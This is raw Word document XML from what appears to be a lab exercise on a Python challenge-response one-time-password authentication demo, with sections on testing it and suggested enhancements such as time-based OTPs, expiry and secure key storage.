    <w:p w14:paraId="0B7789A5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="783"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pP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secrets.token_hex(4)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4-byte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(8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hex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characters) return otp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E84334" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0066E794" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="3057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Server-side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OTP def server_generate_challenge():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CEC966" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="36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challenge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secrets.token_hex(4)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(4-byte random string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4610FD1C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4540"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>otp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generate_otp(challenge,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SECRET_KEY) return challenge, otp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB0617" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="360" w:right="486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Client-side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respond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OTP def client_respond(challenge, otp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB54C43" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:firstLine="4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would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typically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based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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B911E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="18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Here,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simplicity,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we're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directly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passing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correct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OTP return otp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593AD927" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A9A248" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="18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simulate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challenge-response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process def authenticate_user():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C37A53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print("Welcome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System!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3897A6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1F1E7873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generates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OTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF8FA4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challenge,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correct_otp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server_generate_challenge()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D368BCD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109E0FD1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displays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(this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would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shown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client) print(f"Challenge: {challenge}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD17E53" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="360" w:right="426" w:firstLine="4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Simulating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receiving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 xml:space="preserve">response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(OTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E7EEDF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client_otp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client_respond(challenge,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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>correct_otp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C3CE1B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C6CDA2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="486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verifies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client's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response if client_otp == correct_otp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB81F0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4861" w:firstLine="479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("Authentication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Successful!") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A44B5F8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact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print("Authentication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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failed!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1905C682" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9D33C9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D84F3A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="84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 xml:space="preserve"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 xml:space="preserve">": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>authenticate_user()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F646087" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="193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68D7E991" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E28474D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing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otp_challenge_response.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4436D5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="846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15F84566" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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708B207C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246A2B5C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otp_challenge_response.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E3B12" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FCE26D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="583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challenge,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OTP,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 simulate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 process by verifying the OTP provided by the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248754FA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D3CB84" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="7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lastRenderedPageBreak/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Testing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Authentication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System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363378D8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FAFD3E7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generates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random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challenge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OTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761322A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(simulated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here)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sends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back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correct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> OTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE48CD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verifies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prints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whether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successful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failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CBCE9E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC25DD6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6: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Enhancing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OTP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System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E96BDCD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FC19E5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spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:right="366"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Time-based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OTPs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(TOTP)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enhance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adding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time-based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current timestamp as part of the OTP generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7A376A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spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>OTP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Expiry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Implement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expiration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checking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generated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ACB374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ind w:right="1293"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Secure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Storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>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system,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store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secret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securely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(using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storage techniques or databases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406D29BB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000"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A9923EE" wp14:editId="30040D4C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>296452</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2032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15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573FE" id="Group 73" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.35pt;width:486.1pt;height:1.6pt;z-index:-15722496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&#10;AA==&#10;">
                <v:shape id="Graphic 74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VoxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Li8JA&#10;EITvC/6HoQVv60QRH9FRxAd63FXBa5tpk2imJ2ZGjf76nYWFPRZV9RU1mdWmEA+qXG5ZQacdgSBO&#10;rM45VXDYrz+HIJxH1lhYJgUvcjCbNj4mGGv75G967HwqAoRdjAoy78tYSpdkZNC1bUkcvLOtDPog&#10;q1TqCp8BbgrZjaK+NJhzWMiwpEVGyXV3NwpOB728fY26A52+zsfV5vKmE72VajXr+RiEp9r/h//a&#10;W61g0IPfL+EHyOkPAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAI0xhWjEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 75" o:spid="_x0000_s1028" style="position:absolute;left:61704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3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xxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvgv8hvIK3mq2CtlujqCDUQxW3ZaG3x+Z1s3TzsiSprv++EQoeh5n5hlmsetuKM/nQOFbwNM5A&#10;EFdON1wr+PzYPT6DCBFZY+uYFFwpwGo5HCww1+7CJzoXsRYJwiFHBSbGLpcyVIYshrHriJP37bzF&#10;mKSvpfZ4SXDbykmWzaTFhtOCwY62hqqf4tcqKL036+PhfUP7affVzLPyZRNKpUYP/foVRKQ+3sP/&#10;7TetYD6D25f0A+TyDwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMI6nPHEAAAA2w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77" o:spid="_x0000_s1030" style="position:absolute;left:61704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5r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 78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1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UnxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvwv6H8Ba8iKYromvXKIsiCF7UVdzjo3m2xeYlNFHrvzeC4HGYmW+YyawxlbhS7UvLCr56CQji&#10;zOqScwX7v2X3G4QPyBory6TgTh5m04/WBFNtb7yl6y7kIkLYp6igCMGlUvqsIIO+Zx1x9E62Nhii&#10;rHOpa7xFuKlkP0mG0mDJcaFAR/OCsvPuYiJl6Oal6R/cZb8ZbI735bqz+B8p1f5sfn9ABGrCO/xq&#10;r7SC0RieX+IPkNMHAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOMv9SfEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=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E6B470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4BA50DCB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160F0E2C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="59"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9F7743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successfully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generates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random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challenge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OTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF37E8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spacing w:before="1"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successfully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verifies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client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07008EB6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="46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process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simulated,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results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printed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(either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successful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or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>failed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F7DE9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000"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67EDA0D" wp14:editId="6B7FFC76">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295999</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2095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704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90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66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87874" id="Group 80" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.3pt;width:486.1pt;height:1.65pt;z-index:-15721984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&#10;">
